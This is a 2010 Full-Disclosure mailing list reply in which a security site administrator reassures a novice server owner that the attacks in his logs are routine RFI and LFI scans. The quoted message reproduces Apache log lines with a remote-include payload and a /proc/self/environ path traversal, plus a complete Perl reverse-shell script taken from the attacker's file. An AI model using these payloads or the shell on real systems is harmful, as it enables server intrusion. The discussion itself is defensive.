Re: Using of the sites for attacks on other sites

["MustLive" <mustlive () websecurity com ua>]

Hello Dave!

Soon I'll answer on comments of Chris and Sebastien on this topic, but first
I'll answer to your letter. Just only one ask, next time when you'll be
responding to the list at my letter, please, sent a copy of it to my e-mail.
So I'll be knowing about it.

> I have been witnessing such attacks in the past few weeks.

Man, it's another type of attacks. In my article, which I talked about in my
letter to the list, I wrote about using of Abuse of Functionality
vulnerabilities to attack other sites. So different sites become a tool in
hand of attacker to conduct attacks (including DoS and DDoS) on other sites.
I'll write soon additional information about such attacks concerning my last
researches in this topic.

> Most of the urls are trying to exploit components of web software that I
> do not have installed.

In your case we have different type of attacks then described in my article.
And I saw such attacks for many years - I had many such attacks every day
(up to few hundreds per day) at my site from July 2006 and till now. It's
just people, mostly script kiddies, are looking for known vulnerabilities at
the site. And they will not find any of them, if your site is secure.

Particularly, they are looking for know RFI and LFI vulnerabilities in
different web applications. In the first of your examples you can see that
attacker was trying to including back.txt from remote server.

So in all these attacks there are no other sites which were using to attack
your site, it was just scripts which were hosted at different sites
(particularly hacked sites), to include or download them to your server for
execution. So if you have not such vulnerable webapps at your site, then you
have no need to worry about it.

> I think my server is pretty secure, but I am a novice so what do I really
> know? And as such I have blocked these IP's from accessing my server.

As I said, you have no need to worry about these attacks, if you have not
such vulnerable webapps. And to ban or not to ban these IPs it's up to you.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message ----- 
From: mrx
Subject: Re: [Full-disclosure] Using of the sites for attacks on other sites

> I have been witnessing such attacks in the past few weeks. Most of the
> urls are trying to exploit components of web software that I do not have
> installed. Some do GET existing pages such as index.php and tag the attack
> on the end. Such attacks began about 2 weeks ago. These attacks have
> so far come from three different IP addresses. and I was getting around a
> dozen such accesses every other day. I think my server is pretty
> secure, but I am a novice so what do I really know? And as such I have
> blocked these IP's from accessing my server. FYI The originating IP's all
> have wordpress blogs on them.
>
> If anyone is interested here is one such attack:
>
> <apache2 log entry>
>
> 88.181.49.182 - - [28/Jun/2010:19:54:35 +0100] "GET
> /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://212.154.190.140/back.txt??
> HTTP/1.1" 404 220 "-" ...
>
> Here is another example:
>
> 94.199.181.165 - - [21/Jun/2010:05:36:27 +0100] "GET
> /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ
> HTTP/1.1" 200 3775 "-" ...
>
> </apache2 log entries>
>
> <cb.txt content>
>
> #!/usr/bin/perl
> use Socket;
> $cmd= "lynx";
> $system= 'echo "`uname -a`";echo "`id`";HISTFILE=/dev/null /bin/sh -i';
> $0=$cmd;
> $target=$ARGV[0];
> $port=$ARGV[1];
> $iaddr=inet_aton($target) || die("Error: $!\n");
> $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
> $proto=getprotobyname('tcp');
> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
> connect(SOCKET, $paddr) || die("Error: $!\n");
> open(STDIN, ">&SOCKET");
> open(STDOUT, ">&SOCKET");
> open(STDERR, ">&SOCKET");
> system($system);
> close(STDIN);
> close(STDOUT);
> close(STDERR);
>
>
> </cb.txt content>
>
> If anyone would like more log entries let me know.
>
> If all this is beneath you guys.... sorry I bothered you.
>
> regards
> Dave

On 28/06/2010 21:13, MustLive wrote:
> Hello participants of Full-Disclosure!


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/